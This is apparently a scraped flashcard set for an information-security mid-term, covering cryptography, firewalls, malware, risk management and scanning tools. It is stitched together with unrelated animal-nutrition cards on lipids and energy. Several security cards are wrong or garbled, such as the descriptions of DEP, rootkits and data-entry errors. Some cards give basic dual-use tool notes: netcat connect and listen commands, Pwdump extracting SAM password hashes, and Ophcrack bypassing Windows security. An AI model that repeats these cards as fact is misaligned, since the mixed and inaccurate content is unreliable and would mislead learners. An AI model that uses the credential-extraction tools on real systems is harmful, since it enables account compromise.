Mid-Term help
d. OTP
All of the following can be broken mathematically EXCEPT____________. a. AES b. 3DES c. SHA d. OTP
Footprinting
Gathering information about the target. IP addresses, web presence, phone numbers, emails
[6.2] In 2000 the Aust. Privacy Act 1988 was amended to include what?
National Privacy Principles
Security Controls
defense mechanism to protect all components of IS -physical access and communication
TCP Intercepting Firewall
firewall sites between server and internet. Validates and connects to servers.
triage
identifying incident, investigating severity, setting priorities on how to deal with incident
Indirect Calorimetry
measure oxygen consumption and carbon dioxide production calculate heat production
Tracert
mega ping: return the route taken by the packet to the host.
block cipher
message divided into blocks of bits for encryption and decryption purposes
integrity
preventing modification of information to unauthorised individual or systems
SYN Cookies
prevents reservation of resources on initial request. Stores information with the client.
info security laws
seek to protect the civil rights of populations from abuses of info systems and the internet
Encrypted Virus
virus writers encrypt code. Every replication used new key. Decryption code never changes though.
Exploit
weakness or mistake in a program that malware can use.
NIS (Norton Internet Software) 2014
what is the best antivirus software?
Service Control Firewall Technique
what types of internet services that can be accessed. Filter by IP, port
Social Engineering
A means of gathering information for an attack by relying on the weakness of an individual.
Common Network Scanner Tools:
- Solar Winds - Lanhelper
Security Technologies: - Types of IDS:
- HIDS - NIDS
TLS steps
1. handshaking - exchange master secret key using asymmetric crypto 2. Key Derivation - master key used to generate a set of session keys. 3. Data transfer - data is broken into records for travel 4. Connection closure - special message is sent to ensure proper closer
Information Assets
A risk management strategy calls on information security professionals to know their organization's _____., Valuable or sensitive data is 'Information asset' • Examples - Confidential information about employees - Information about commercial contracts - Production information of factories • Categorize information assets - Highly valuable financially - Sensitive but not financially valuable • Reputation • Political • Identification of assets should be a relatively straightforward • Valuation of assets is more of a challenge.
Macro
A series of instructions that can be grouped together as a single command, often used to automate a complex set of tasks or a repeated series of tasks.
Protocol
A set of rules governing the exchange of data between two or more entities.
Energy Values in Poultry
AME (apparent metabolizable energy) -GE of feed -fecal, urinary (gas is negligible) -If corrected for nitrogen retention = AMEn TME (true Metabolizable energy) -GE -excreta energy -Test ingredient substituted for ingredient of known ME or Subtract excreta energy in fasted birds
Rootkid
Admin access to system
Email address spoofing
Altering the sender information on email to trick recipients into thinking the message if from another source.
Spidering
Automated mapping of websites or file system. Program that recursively follows all links in a HTML document. can reveal old insecure pages, backups, databases connected etc.
[5.6] Briefly define biometric
Automated method of verifying the identity or recognising someone based on physiological or behavioural characteristic.
In order to recover or prevent virus attacks:
Avoid potentially unreliable websites/emails. System Restore. Re-install operating system. Use and maintain anti-virus software.
Firewall
Barrier between trusted and untrusted networks. prevents unauthorised traffic from reaching the network.
____ plans usually include all preparations for the recovery process, strategies to limit losses during the disaster, and detailed steps to follow when the smoke clears, the dust settles, or the floodwaters recede.
DR
____________________ components account for the management of information in all its states: transmission, processing, and storage.
Data
[4.4] Policy enforcement phase. Why is the order of steps important?
Doesn't make sense to check if subject authorised unless you are satisfied if request is made from right subject.
Phishing carried out what.
Email, instant messaging
Removable storage is a software application that allows an organization to monitor and control business data on a personally owned device.
False
Risk evaluation assigns a risk rating or score to each information asset.
False
If Everythingabovecangowrong
Need recovery contingency plan/policy
Salt
Random but not secret information, different for each user.
[5.8] How can you reduce FNMR?
Reduce threshold.
Encryption (E)
Transforming the plaintext into another form so that the meaning is not obvious, using an algorithm and some secret knowledge
[1.2] Data state of Jeep Cherokee?
Transmission (initially) of information related to Uconnect.
Lipid Types
Triglycerides -Fatty acid chain length and unsaturation -Trans fatty acids• Essential fatty acids •eicosanoids• -Biohydrogenationin the rumen -Conjugated Linoleic Acid (CLA) Phospholipids Steroids Fat Quality
Lipids
Triglycerides •Fatty acid chain length and unsaturation •Trans fatty acids Essential fatty acids •Eicosanoids -Biohydrogenationin the rumen -Conjugated Linoleic Acid (CLA) Phospholipids Steroids Fat Quality
Failing to prevent an attack all but invites an attack.
True
Using a secure logon and authentication process is one of the six steps used to prevent malware.
True
When the organization is pursuing an overall risk management program, it requires a(n) systematic report that enumerates the opportunities for controlling risk.
True
Which of these is a list of approved email senders?
Whitelist
full backup
all files in computer
role based access control
determine how subjects and object interact based on necessary operations and task a user needs to carry out to fulfill their responsibilities
Which of the following is NOT a motion detection method?
moisture Motion Detection Method: radio frequency magnetism infrared
motivation for hackers & types
theft, hijacking, cyber terrorism, "for fun" // types are white hat vs black hat authorized vs unauthorized
Stateful Firewall Filtering
track TCP connections. Only accepts packets on established connections. Negatives: requires more memory, not advanced, can't detect IP spoof, easy to misconfigure.
Wireshark
traffic monitor. Capture messages moving through network card. Can save and filter sessions.
risk transfer
transfer risk to third party
What is Social engineering?
• This involves the psychological manipulation of people in order to establish a level of trust that leads to the individual taking action - Divulging sensitive and private information, initiating funds disbursement request, etc. • The most common form is "phishing."
What's the impact of Call Forwarding?
• Your phone is compromised, your conversations may be accessed, and your identity may be stolen. • In the end, our client's assets may be stolen because the fraudster requested and authorized a transaction.
Energy Outline
•Concept in Nutrition •Partitioning or Distribution •Species differences •Energy Density •Predicting the requirement -Body weight -Growth -Temperature / activity effects •Effect of energy on feed intake •Feed efficiency •Regulation of feed intake
Types of threats
Natural Events Human action - Deliberate: fraud, sabotage, theft - Accidental: negligence, errors, omissions
Risk measure defines the quantity and nature of risk that organizations are willing to accept as they evaluate the tradeoffs between perfect security and unlimited accessibility.
False
Spam is some act intended to deceive or trick the receiver, normally in email messages.
False
The anti-malware utility is one of the most popular backdoor tools in use today.
False
The first step in creating a comprehensive disaster recovery plan (DRP) is to document likely impact scenarios.
False
The main difference between a virus and a worm is that a virus does not need a host program to infect.
False
The term risk methodology refers to a list of identified risks that results from the risk-identification process.
False
Vishing is a type of wireless network attack.
False
Wardialers are becoming more frequently used given the rise of Voice over IP (VoIP).
False
Within best practices, the optimum standard is a subcategory of practices that are typically viewed as "the best of the best."
False
Within organizations, technical feasibility defines what can and cannot occur based on the consensus and relationships between the communities of interest.
False
You cannot use qualitative measures to rank values.
False
What compliance regulation applies specifically to the educational records maintained by schools about students?
Family Education Rights and Privacy Act (FERPA)
Establishing a competitive business model, method, or technique enabled an organization to provide a product or service that was superior and created a(n) competitive advantage.
True
Information Security 3 sectors
Internet: Geotagging and Hacking E-commerce: Privacy and security issues Telecommunications: information leakage and metadata collection
Which statement about data loss prevention (DLP) is NOT true?
It can only protect data while it is on the user's personal computer
Which statement about data loss prevention (DLP) is NOT true?
It can only protect data while it is on the users personal computer
Energy Distribution, Partitioning, Utilization
Net Energy = NEm+ Nep -Maintenance (NEm) •Heart rate (10%), kidney (7%), protein turnover (10), CNS activity (15), respiration (7), liver (7) •Ion balance (35) -Production (NEp) •Tissue (muscle, fat) •Lactation, egg production •Pregnancy' •Wool, hair, feathers •Work
Examples of exceptionally grave damage include armed hostilities against the United States or its allies and disruption of foreign relations vitally affecting the national security.
True
In a Bring Your Own Device (BYOD) policy, the user acceptance component may include separation of private data from business data.
True
Leaving unattended computers on is one of the top information security mistakes made by individuals.
True
One way to determine which information assets are critical is by evaluating how much of the organization's revenue depends on a particular asset.
True
Organizations should communicate with system users throughout the development of the security program, letting them know that change are coming.
True
Policies are documents that specify an organization's approach to security.
True
Remote wiping is a device security control that allows an organization to remotely erase data or email in the event of loss or theft of the device.
True
Risk control is the application of controls to reduce the risks to an organization's data and information systems.
True
Rootkits are malicious software programs designed to be hidden from normal methods of detection.
True
Security efforts that seek to provide a superior level of performance in the protection of information are referred to as best business practices.
True
Some argue that it is virtually impossible to determine the true value of information and information-bearing assets.
True
Spyware gathers information about a user through an Internet connection, without his or her knowledge.
True
The Government Information Security Reform Act (Security Reform Act) of 2000 focuses on management and evaluation of the security of unclassified and national security systems.
True
The amount of money spent to protect an asset is based in part on the value of the asset.
True
The business impact analysis (BIA) identifies the resources for which a business continuity plan (BCP) is necessary.
True
The general management of an organization must structure the IT and information security functions to defend the organization's information assets.
True
The mitigate control strategy attempts to reduce the impact caused by the exploitation of vulnerability through planning and preparation.
True
The most common of the mitigation procedures is the disaster recovery plan.
True
The recovery point objective (RPO) is the maximum amount of data loss that is acceptable.
True
The results from risk assessment activities can be delivered in a number of ways: a report on a systematic approach to risk control, a project-based risk assessment, or a topic-specific risk assessment.
True
The term risk management describes the process of identifying, assessing, prioritizing, and addressing risks.
True
The tools for conducting a risk analysis can include the documents that define, categorize, and rank risks.
True
The value of intellectual property influences asset valuation.
True
To determine if the risk is acceptable or not, you estimate the expected loss the organization will incur if the risk is exploited.
True
When determining the relative importance of each asset, refer to the organization's mission statement or statement of objectives to determine which elements are essential, which are supportive, and which are merely adjuncts.
True
You should adopt naming standards that do not convey information to potential system attackers.
True
Derivatives of Cholesterol
Vitamin D3 Glucocorticoids (cortisol, corticosterone) Mineralocorticoids Bile salts (cholic acid, taurocholic, glycocholic, etc) Estrogen Progesterone Testosterone
[3.1] Relationship btwn threats, vulnerabilities and attacks
Vulnerabilities can be deliberately exploited by threats and results in an attack on the information asset.
b. Diffie-Hellman (DH)
Which of the following key exchanges uses the same keys each time? a. Diffie-Hellman Ephemeral (DHE) b. Diffie-Hellman (DH) c. Diffie-Hellman-RSA (DHRSA) d. Elliptic Curve Diffie-Hellman (ECDH)
d. Hardware Security Module (HSM)
Which of these has an onboard key generator and key storage facility, as well as accelerated symmetric and asymmetric encryption, and can back up sensitive material in encrypted form? a. Trusted Platform Module (TPM) b. self-encrypting hard disk drives (HDDs) c. encrypted hardware-based USB drives d. Hardware Security Module (HSM)
a. risk loss
Which of these is NOT a basic security protection for information that cryptography can provide? a. risk loss b. integrity c. confidentiality d. authenticity
a. Collisions should be rare
Which of these is NOT a characteristic of a secure has algorithm? a. Collisions should be rare b. The results of a hash function should not be reversed. c. The hash should always be the same fixed size d. A message cannot be produced from a predefined hash
a. Advanced Encryption Standard
Which of these is the strongest symmetric cryptographic algorithm? a. Advanced Encryption Standard b. Data Encryption Standard c. Triple Data Encryption Standard d. Rivest Cipher (RC) 1
c. integrity
Which protection is provided by hashing? a. authenticity b. confidentiality c. integrity d. availability
Which of the following is not designed to prevent individuals from entering sensitive areas but instead is intended to direct traffic flow.
barricade
black box
basic or no information is provided
PCs
bitlocker
smurf
broadcasting large number of ICMP packets with victim's spoofed source IP
A____ Can be used to secure a mobile device
cable lock
double encoding
can be used to bypass many text-based security filters. defense: filter dangerous characters, re-encode at every boundary
exposure
of an info resource is the harm, los or damage that can result if a threat compromises the resource
mandatory access control
operating system constrains ability of subject to access or perform operation on an object
Boot Sector Virus
original virus. Sits on a boot sector and activated on boot.
discretionary access control
owner of resource specify which subjects can access specific resources
Attack Vectors
parts of the application that can be reached by users. All attack vectors form the attack surface
object
passive entity that contains information or needed functionality
deterrent control
discourage potential attacker
network usage policy
document, agreement, or contract that defines acceptable and unacceptable uses of computer and network resources for a business or organization
redundancy
duplication of critical components/functions of system with intention of increasing reliability and availability of system
digital certificate
electronic document used to prove ownership of public key
For hardware devices, the ____________________ number is used by the network operating system to identify a specific network device.
electronic serial, MAC address, or hardware address
Network Security
is concerned with addressing vulnerabilities and threats in computer networks that may or may not be connected to the internet as long as there is a network connection there is an increased risk of unauthorized access. The primary challenge in securing a computer network is keeping user data private and accessible only by authorized persons
Malware
is short for "malicious software" and included any software designed to damage, corrupt, or illegally manipulate computer resources common forms include; viruses, worms, and spyware
exposure factor
percentage loss by realised threat
A typical configuration baseline would include each of the following Except.
performing a security risk assesment
Which of the following is NOT a characteristic of an alarmed carrier PDS?
periodic visual inspections
demilitarised zone
physical or logical subnetwork that contains and exposes organisation's external facing services to a larger and untrusted network
communication controls
network controls - secure the movement of data across networks: -firewalls -antimalware -white/black listing -encryption -VPNS -transport layer security -employee monitoring system
firewall
network hardware or software that examines data packets flowing in and sometimes out of a network or computer in order to filter out packets that are potentially dangerous
interior threats
network security threats that originate from within a network, typically from registered users
RATs (remote administration tool)
obtained through small files like online greeting cards, games, or free software what can they do? -log keystrokes -capture voice conversations -capture web camera -hijack computers
Which of the following is NOT an activity phase control
resource Control Activity Phase Control: compensating control detective control deterrent control
data custodian
responsible for maintaining and protecting data
data owner
responsible for protection and use of information
ransomware
restricts access to computer system until ransom is paid
firewall
restricts access to one network from another network
recovery control
return environment back to regular operation
security awareness training
teaches the knowledge and attitude members of organisation should posses regarding protection of physical and information assets of organisation
risk avoidance
terminating activity introducing the risk
Ping
test connection between hosts. Sends "are you there?" messages
War driving
the act of driving through neighborhoods with a wireless notebook or handheld computer looking for unsecured Wi-Fi networks
identification
mapping an unknown entity to a known identity as to make it known
hash
mapping of data of arbitrary length to data of fixed length
cipher (algorithm)
mathematical and logic rules used in cryptographic functions
steganography
method of hiding data in another media type to conceal it's existence
data-entry errors
mishandling of computer output
asset value
monetary value of asset
wiretapping
monitoring telephone and Internet conversation by a third party, by covert means
antivirus
software used to prevent, detect and remove malicious computer viruses
Software Patch
sometimes called a security patch, fixes software bugs and flaws and is typically distributed to software users through online software updates
worm
standalone malware that replicates itself and spreads to other computers
code review
systematic examination of source codw
Which of the following cannot be used along with fencing as a security parameter?
Vapor barrier
[5.6] Which is faster at returning results Verfication mode or identification mode? (biometrics)
Verification is faster. It only requires 1-to-1 comparison. Identification has to search entire database (n-to-1 comparison).
Entity Authentication
Verify claimed identity.
Data Origin Authentication
Verify source and integrity of message.
Authentication
Verifying a claimed identity or source of information.
Essential Fatty Acid Deficiency
Very Rare Difficult to induce on common diets Most common deficiency symptom is dermatitis or other skin problems. Benefits of increasing omega-3 over omega-6
What's the impact of phishing?
Victims of phishing may have malware installed on their computer systems or have their identity stolen.
vulnerability
weakness in design, implementation, operation or internal control of process that could expose system
log key strokes, capture voice conversations, capture web camera video sessions, hijack computers
what can RATs do?
in situations where the info being stored is confidential or valuable, and there is a possibility that your computer can be accessed by others
when is encryption useful?
Footprinting Tools
who.is, nslookup, social engineering
Code injection via Stack Smash
write payload into function then processor executes payload
HTTP Flood
zombie follow every link on each site recursively. Target consumes resources responding to zombies.
Spyware
§ A broad category of software designed to intercept or take partial control of a computer's operation without the informed consent of that machine's owner or legitimate user § In simpler terms, spyware is a type of program that watches what users do with their computer and then sends that information over the internet § Spyware can collect many different types of information about a user: • Records the types of websites a user visits • Records what is typed by the user to intercept passwords or credit card numbers • Used to launch "pop up" advertisements § Many legitimate companies incorporate forms of spyware into their software for purposes of advertisement(Adware)
What does Malware look like?
§ Hostile, intrusive, or damaging software or program code ("malicious" + "software") • Examples of malware include viruses, worms, Trojan horses, ransomware, and spyware.
Nessus
- The Most Widely Used Vulnerability Scanner - A Commercial Tool that has Tens of Thousands of Documented Vulnerabilities in its Library - Works on: Linux, Windows, Routers
Other Security Technologies: - Data Loss Prevention (DLP)
- Monitor Outgoing Network Traffic to look for Key Files going out - It can also Monitor Data Storage of Sensitive Documents to Log when Data is Accessed
Troubleshooting Common Security Issues: - Common Configuration Issues (Filtering)
- Most Access Points offer some Level of Filtering - It should be Turned on and Configured
Steganography
- NOT cryptography - Used to hide information within a document or image so the presence of the message is not detected. - Some techniques make use of crypto
[4.3] Describe what is meant by need to know principle and separation of duties.
- Need to know = access restricted to those who need to know information to complete job. - Separation = break tasks into multiple components, each performed by different entity.
RATs
(Remote Administration Tool) obtained through small files like online greeting cards, games, or free software
Rootkit
* Upon penetrating a computer, a hacker may install a collection of programs, called a rootkit. * May enable: - Easy access for the hacker (and others)into the enterprise - Keystroke logger * Eliminates evidence of break-in. * Modifies the operating system.
Adware
**Advertising-supported software is any software package which automatically plays, displays, or downloads advertising material to a computer after the software is installed on it or while the application is being used. **Adware is software integrated into or bundled with a program, typically as a way to recover programming development costs through advertising income
What's is Botnet
*A botnet is a number of compromised computers used to create and send spam viruses or flood a network with messages as a denial of service attack. *The compromised computers are called zombies.
How does viruses happen?
*A virus attaches itself to a program, file, or disk. *When the program is executed, the virus activates and replicates itself. *The virus may be benign or malignant but executes its payload at some point (often upon contact). -Viruses can cause computer crashes and loss of data.
RC4 Algorithm
- "Ron's Cipher #4" - Keystream generator for binary additive stream cipher - Input: key length up to 2048 bits - Output: pseudorandom binary sequence produced 8 bits - Only a few lines of code (~20) - Fast in software
Solar Winds
- A Commercial Network Scanner - Allow you to Select an IP Range, Subnet, or List of IP Addresses to scan and then start the scan - Will Produce a Map of your Network
Tcpdump
- A Common Packet Sniffer for Linux - Works from the Shell and is Relatively Easy to Use
Kerberos: - Basic Information
- Network Authentication Protocol - Developed at MIT in the mid 1980s - Available as Open Source or in Supported Commercial Software
Types of Authentication: - Federations
- A Federation is a Collection of Computer Networks that Agree on Standards of Operation, such as Security Standards - For Example, Instant Messaging Federation (IM): 1. Multiple IM Providers form Common Communication Standards, thus allowing Users on Different Platforms with Different Clients to Communicate Freely. This would Facilitate Communication between Employees in each of the Various Partners - Other Example, Microsoft Passport or Google Checkout: 1. Allows a User to have a Single Identity that they can use across Different Business Units and perhaps even Entirely Different Businesses
Wireshark
- Network Packet Sniffers - Penetration Tester use it Regularly - Provides a Convenient Graphical User Interface
Example of Denial of Receipt
- A customer orders an expensive product, but the vendor demands payment before shipment. - The customer pays, and the vendor ships the product. - The customer then asks the vendor when he will receive the product. - If the customer has already received the product, the question constitutes a denial of receipt attack. - The vendor can defend against this attack only by proving that the customer did, despite his denials, receive the product.
Example of Repudiation of origin
- A customer sends a letter to a vendor agreeing to pay a large amount of money for a product. - The vendor ships the product and then demands payment. - The customer denies having ordered the product - The customer has repudiated the origin of the letter. - If the vendor cannot prove that the letter came from the customer, the attack succeeds.
Mechanisms/Countermeasures
- A security mechanism is a method, tool, or procedure for enforcing a security policy. - Supporting mechanisms assumed to be working correctly - What concrete actions we should take under an attack or withstand threats?
policy
- A security policy is a statement of what is, and what is not, allowed. - This defines 'security' for the site/system/computer/data/information, etc. - It is about imposing rules to reduce risks to assets at an acceptable level - A security policy is a specification of what security requirements/goals the countermeasures are intend to achieve - "Perfect security" is not necessary and costly, even not possible - Secure against what, from whom, and when? - Unambiguously partition system states - Correctly capture security requirements - Composition of policies • If policies conflict, discrepancies may create security vulnerabilities
ARP (Address Resolution Protocol)
- ARP Protocol Maps IP Addresses to MAC Addresses
[3.3] What sort of information is included in AusCERT security bulletin?
- ASB or ESB (AusCERT or External) - ID number - [tag] with affected systems - Product name - Most sever impact if exploited.
Troubleshooting Common Security Issues
- Access Issues - Configuration Issues - Personnel Issues - Other Issues
Troubleshooting Common Security Issues: - Common Configuration Issues (Logging)
- Access Points typically offer Logging that must be Turned on and Configured
Benefit of combining MAC and DAC?
- No owner can make sensitive info available to unauthorised users - 'Need to know' can be applied to limit access that would otherwise be granted under mandatory rules
Processes need to consider
- Access control and privilege management - Backup of files & systems - Business of continuity plans - Communications - Checks and balances - Processes for staff leaving/joining - Software mngt processes and auditing
Principle of least privilege
- Access is generally restricted to the minimum resources and authorisations required for an entity to perform their day-to-day function. - Intended to limit lvl of damage if a security incident occurs.
netcat
- Not Part of OS - Free Download for Windows/Linux - Allows you to Read and Write to Network Connections using either TCP or UDP
nc mymail.server.net 25
- Open a Connection to a Mail Server on Port 25
Assets: Functionality, Information, Risks, Security ( One of the goals of security is about regulating access to assets)
- Access to information, or - Access to functionality. • Computer system provides two assets: functionality and information - Compute GPA (functionality) - GPA (information) • Functionality comes with certain risks - What are the risks of computing GPA? • Intentional incorrect computing of GPA • Information has also risks - Privacy • GPAleakage - Integrity of GPA • Modification of GPA) • Security is about identifying, managing, and minimizing risks.
Social Engineering
- Active attack Use social skills to convince people to reveal information or permit access to resources.
Vulnerability Scanners can be Classified as Either:
- Active or - Passive
Protocol Analyzer (Packet Sniffer)
- Allow us to View Traffic and Capture a Copy of the Traffic for Offline Analysis - Help you Incident Response, and Network Forensics
Digital Signature Algorithm (DSA)
- Also called Digital Signature Standard (DSS) - Based on discrete log problem
Other Security Technologies: - Unified Threat Management System (UTM)
- Also called USM (Unifies Security Management) System - Includes Combinations of all the other Devices: 1. Firewall, IDS, and Antivirus, as well as other Items, such as Load Balancing and VPN 2. A Single Place to Review Logs rather than having to Check Multiple Devices and System Logs
LanHelper
- An Inexpensive Network Mapper - You can Issue Statements Like: Scan Lan Scan IP Scan Workgroups
Wireless Scanners and Crackers
- The Network Scanners Mentioned above can be used for Wireless Networks, but There are also Tools specifically designed for WiFi that you can use - A Common WiFi Tool is Aircrack
Four Pilars of Information Security
-firewall -installing software patches -using security software -practicing safe cautious online behavior
attack
- Anattackisanytypeofoffensivemaneuverthattargetsinformationassets,computingassets, computer infrastructures, computer resources, etc. - Acyberattackcouldbeemployedbynations,states,individuals,groups,societyororganizations. - Acyberattackmayoriginatefromananonymoussource. - Anattackhasanimplicitconceptof"intent" - Routermis-configurationorservercrashcanalsocauselossofavailability,buttheyarenot attacks.
Phospholipids
-function in cell membranes, etc. -glycerol, 2 fatty acids, other
threat
- Athreatisapotentialviolationofsecuritymechanismsorundesirableeventthatmaybe malicious. - Athreatisanintentiontoinflictharm,damage,orotherhostile/unauthorizedactiononsomeone's assets - Apersonoranentityislikelytoposethreatstoassets.
What are the benefits of digital signatures?
- Authentication of message sender - Some assurance of message integrity - Non-repudiation (third party can decide if a specific party signed a message)
Non-repudiation for accountability
- Authorized users cannot deny actions (received a message, sent a message)
Vulnerability
- AvulnerabilityisaweaknessinthesystemswhichcanbeexploitedbyaThreatActor,suchasan attacker, to perform hostile/unauthorized actions such as attacks. - Toexploitavulnerability,anattackermusthaveatleastoneapplicabletoolortechniquethatcan be used.
Mixed Triglyceride:
-palmitate (16:0) -oleate (18:1) -stearate (18:0)
[9.1] Before encrypted messages can be sent, each communicating party must have a copy of the secret key. How can this key be distributed securely if asymmetric ciphers are NOT used?
- Over a different secure channel - Through a trusted 3rd party = role of key server
Iodine Value
= grams of Iodine absorbed per 100 g of oil.Measure of the # of double bonds.
Methods of DoS Attacks
- Overload the resource so it cannot respond to legitimate requests. - Damage the resource so it cannot be used. - Deliberately interrupt communications between users and resource so it cannot be accessed.
How bot net work?
- Botnets spread through viruses and worms • Once installed on the victim's computer, they use the internet to make contact with a controller computer • The infected computer (often called a zombie) will do nothing more except periodically check for instructions from the controller computer • Over time, more and more computers are recruited to the incipient botnet until it may contain tens of thousands of zombies, • These zombies don't raise suspicion as they appear to be doing nothing • The controller computer will issue a command for the botnet to wake up and begin doing something. • Often the people who created the botnet itself have either sold or rented the botnet to another group who want to use its capabilities.
Types of Authentication: - Multifactor Authentication
- Can Consist of Two, Three, Any Number of Factors - Example: An ID / Password and a Smartcard is a Two Factor Authentication
Ophcrack
- Can be Installed on a Bootable CD - If used in that Manner, you boot the System to the CD, thus Circumventing Windows Security, and proceed to Try to Crack the Passwords - Ophcrack offers a small Rainbow Table free of Charge
Defense against DDos
- Cloud hosting - Coordination with upstream providers.
tracert
- Command is tracert in Windows and traceroute in Linux - tracert or traceroute tells you how to get there
Ping
- Part of Both Windows and Linux - The Ping Utility is used to Find out if a Particular Website is Reachable - Ping Operates by Sending Internet Control Message Protocol (ICMP) Echo Request Packets to the Target Host and Waits for an ICMP Response
[1.2] Which of security goals are compromised if the attacks described in the article are performed on a Jeep?
- Confidentiality: cellular network traffic reveals vulnerable vehicle, track GPS, trace route over time, measure speed, monitor in car systems etc. - Integrity: changes made to firmware to insert the code that allows for the remote control. - Availability: can take control away from authorised user.
[4.6] Google drive etc. Does the system use discretionary, mandatory, or role-based access control, or a combination of these?
- DAC.
General Networking Tools
- Data Sanitization Tools - Backup Utilities - Banner Grabbing
Troubleshooting Common Security Issues: - Common Configuration Issues (Default Passwords)
- Default Passwords must be Changed Immediately
Disruption/Usurpation
- Denial of service • A long-term inhibition of service, is a form of usurpation, although it is often used with other mechanisms to deceive. • The attacker prevents a server from providing a service.
Troubleshooting Common Security Issues: - Digital Certificate Issues
- Digital Certificates also must be Configured and Implemented Properly - Issue Certificates in a Secure Manner (Use Proper Key Size, Key is Stored Securely) - It is better to have an Organizational Certificate Authority Issue Certificates
What are the major access control approaches?
- Discretionary Access Control (DAC) - Mandatory Access Control (MAC) - Role Based Access Control (RBAC) Can use a combination.
ARP Flags: -a
- Displays all of the Current arp entries
ARP Flags: -g
- Displays all the Current arp entries for all Interfaces. Same as -a
Troubleshooting Common Security Issues: - Other Issues
- Don't allow Unlicensed Software Installation - Comply with Copyright Laws - Restrict (SMS: Short Message Service, MMS: Multimedia Messages Service)
Kerberos: - Use Explained (2)
- Each Time the User Wishes to Access some Resource on the Network, the User's Computer presents KDC with the TGT - The TGT then Sends that User's Computer a Service Ticket, granting the User Access to that Service - Service Tickets are usually only good for up to 5 minutes - The User's Computer then sends the Service Ticket to the Server the User is trying to Access - As a Final Authentication Check, that Server then Communicates with the TGT to Confirm and Validate the Service Ticket
Process of decryption for Vernam OTP
- Each character = 8bit string - The decryption key = encryption key. - Decryption algorithm is XOR. - Each character has different 8 bit string (key portion) - For whole message, key length must = length of plaintext. RANDOMNESS is what provides the security
Asymmetric Ciphers (Public Key Cipher)
- Encryption key DOES NOT EQUAL decryption key - Computationally infeasible to derive one key from the other
Network Scanners Can:
- Enumerate everything on a Network - Detect Rogue Systems
[3.4] Name things attackers can do to multi-functional photocopiers.
- Execute unauthorised code. - DoS attacks Attacker requires remote unauthenticated access.
Other Security Technologies:
- File Integrity Checking - Application Whitelist - Unified Threat Management (UTM) System - Data Loss Prevention (DLP) Software - Data Execution Prevention (DEP)
[3.4] Describe a threat to multi-functional printers.
- Files sent to printer can be viewed, copied, redirected, modified and re-transmitted. - Confidentiality breach may occur - Integrity breach may occur. - Possible to cancel or delete files before printed.
nmap
- Free Download for Windows/Linux - It is a Port Scanner - It can Reveal what Services are Running - It Can Reveal Target Machine's OS - Can Scan: A Range of IP Addresses or A Single IP Address
Pwdump
- Get a Copy of the Local Password Hashes from the Windows SAM File - The SAM File, or Security Accounts Manager, is where Windows stores Hashes of Passwords. The Program Pwdump will extract the Password Hashes Form the SAM File
Active Attacks
- Goal is to modify, replicate of fabricate. - Can detect and try to recover e.g. phishing, DOS, Main-in-the-middle
Passive Attacks
- Goal is to obtain information - Difficult to detect e.g. eavesdropping, shoulder surfing.
Network Scanner (Network Mapper)
- Help you Find out what is on your Network
Security Technologies
- IDS - Antimalware - Firewalls - Other Systems
Identify and Access Management Concepts:
- Identification means finding out who Someone is - Authentication is a Mechanism of Verifying that Identification - Put another way, Identification is Claiming an Identity - Authentication is Proving it
[3.1] Difference between passive and active attacks
- Passive do not require an attacker, difficult to detect. - Active = attacker takes some action to interact with asset, if you monitor you can detect.
Macro Virus
A computer that is written in a script known as a macro.
Example of Masquerading or spoofing
- If a user tries to log into a computer across the Internet but instead reaches another computer that claims to be the desired one, the user has been spoofed. - Similarly, if a user tries to read a file, but an attacker has arranged for the user to be given a different file, another spoof has taken place.
Program Virus
A computer virus that infects executable program files.
Summary: Fat in Animal Nutrition
"Fat" is usually referring to triglycerides•Fat is added to diets as an energy source, for palatability, to decrease dust Fat is energy dense Animals fed diets with added fat generally have greater carcass fat Feeding unsaturated fat to non-ruminants results in unsaturated fat being deposited in the carcas
Use Password Crackers on your Network:
- If you are able to Crack one or more Passwords - You are then Aware of this Security Vulnerability and can take Appropriate Steps to Remedy the Issue
Vulnerability Scanners: Passive Scanners
- Involves Methods to Search your Network that do not Directly Interact with the Network
Known Initialisation Vector (IV)**
- Is public - Prevents repetition of data
Troubleshooting Common Security Issues: - Common Configuration Issues (Failure to Patch Network)
- Items such as: Firewalls, Access Points, Switches, and Routers - All have OS that must be Patched, just as you Patch your Computers
Stream Ciphers
- Plaintext & ciphertext are streams of characters Process: - Plaintext encrypted one character at a time by combining with a keystream - Ciphertext decrypted one character at a time by combining with the same keystream used for encryption
Kerberos: - In Depth
- Kerberos Authentication uses a Key Distribution Center (KDC) to Orchestrate the Process - The KDC Authenticates the Principal (which can be a User, Program, or System) and Provides it with a Ticket - After this Ticket is issued, it can be used to Authenticate against other Principals - This process occurs automatically when another Principal performs a Request or Service
RSA Signatures
- Key generated same way as RSA encryption
[4.3] To what extent can mandatory access control (MAC) be used to implement the need to know principle?
- Limited ability to implement need to know. - Typical MAC rules use user clearances and object classification based on hierarchical levels. A user who fits such a rule will have access regardless of whether that user has a current need to access the data or not.
Other Security Technologies: - Application Whitelisting
- List of Applications that are Allowed on a Given Computer or Network - They Log Attempts to Install Unauthorized Applications - You are not Allowed to Install a Password Checker
nc -I -p 12345
- Listen on Port 12345
ARP Flags: -N
- Lists arp cache for a Specified Interface
MBSA (Microsoft Baseline Security Analyzer)
- MBSA is not the Most Robust Vulnerability Scanner - It is Free - It Finds Vulnerabilities and Configuration Issues - Very Easy to Use
SSH security properties
- Message confidentiality - Message integrity - Message Replay protection: money transfer example. - Peer Authentication.
CLA Applications in Non-ruminants (pigs, poultry, fish)
"Value-added"foods with human health benefit •Repartitioning effect •Health benefit to the animal
malware
"malicious software" & includes any software designed to damage, corrupt, or illegally manipulate computer resources
Other Security Technologies: - Data Execution Prevention (DEP)
- Microsoft Introduced this with Windows Vista - When an Application tries to Launch, the User must approve the Execution before it can Proceed - Some DEP Systems Log any time an Application tried to Execute, even if it was Blocked - Even if the Malware is Blocked, You would want to Know that there was an Attempt to Execute
Binary Additive One-time pad (Vernam OTP)
- Plaintext is a stream of bits - Key is a stream of bits - XOR of plaintext and key to produce ciphertext - XOR of ciphertext and key to recover plaintext - Can not reuse or repeat keys, each message requires a NEW random key.
Ipconfig (Windows) / Ifconfig (Linux)
- Provides Information about your Network Interfaces
OWASP Zap (Open Web Application Security Project Zap)
- Publish a List of the Top Vulnerabilities - Also Publish a Free Tool to Scan for Website Vulnerabilities - Easy to Use
Tools Commonly used for Password Cracking:
- Pwdump - Ophcrack
Remote Authentication Dial-in User Services (RADIUS)
- RADIUS allows Authentication of Remote and other Network Connections - A RADIUS Server can be managed centrally, and the Servers that allow access to a Network can Verify with a RADIUS Server whether an Incoming Caller is Authorized - In a Large Network, with many Connections, this Allows a Single Server to Perform all Authentications
Password checking strategies
